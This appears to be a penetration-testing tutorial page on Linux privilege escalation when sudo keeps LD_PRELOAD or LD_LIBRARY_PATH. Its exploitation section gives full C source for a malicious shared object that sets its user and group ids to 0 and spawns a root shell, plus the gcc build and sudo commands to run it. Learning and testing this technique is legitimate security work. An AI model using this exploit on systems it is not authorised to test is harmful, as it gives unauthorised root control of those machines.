LD_PRELOAD, LD_LIBRARY_PATH Overwriting

LD_PRELOAD and LD_LIBRARY_PATH might be vulnerable to privilege escalation (PrivEsc).

Investigation

Check sudo commands.

sudo -l

The below is the output example.

env_keep+=LD_PRELOAD

(ALL : ALL) NOPASSWD: somecmd

If we find the sudo command keeps LD_PRELOAD environment, we can overwrite this variable to load our custome shared object and escalate the privileges.

Also, we can replace the LD_PRELOAD with LD_LIBRARY_PATH.

By the way, to list shared libraries required by the executable, use ldd command.

ldd somecmd

Exploitation

First off, create exploit.c under /tmp .

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void inject()__attribute__((constructor));

void inject() {
	unsetenv("LD_PRELOAD");
	setuid(0);
	setgid(0);
	system("/bin/bash");
}
  • The "constructor" attribute is a special type of function attribute in GCC. It tells the compiler to automatically call the function before the main function.

Now compile the c program to shared object.

# -fPIC: Generate Position Independent Code.
# -shared: Generate a shared library.
# -o: Output shared object.
gcc  -fPIC -shared -o exploit.so exploit.c

We can execute command with setting the shared library to LD_PRELOAD variable then spawn the root shell.

sudo LD_PRELOAD=/tmp/exploit.so somecmd

Last updated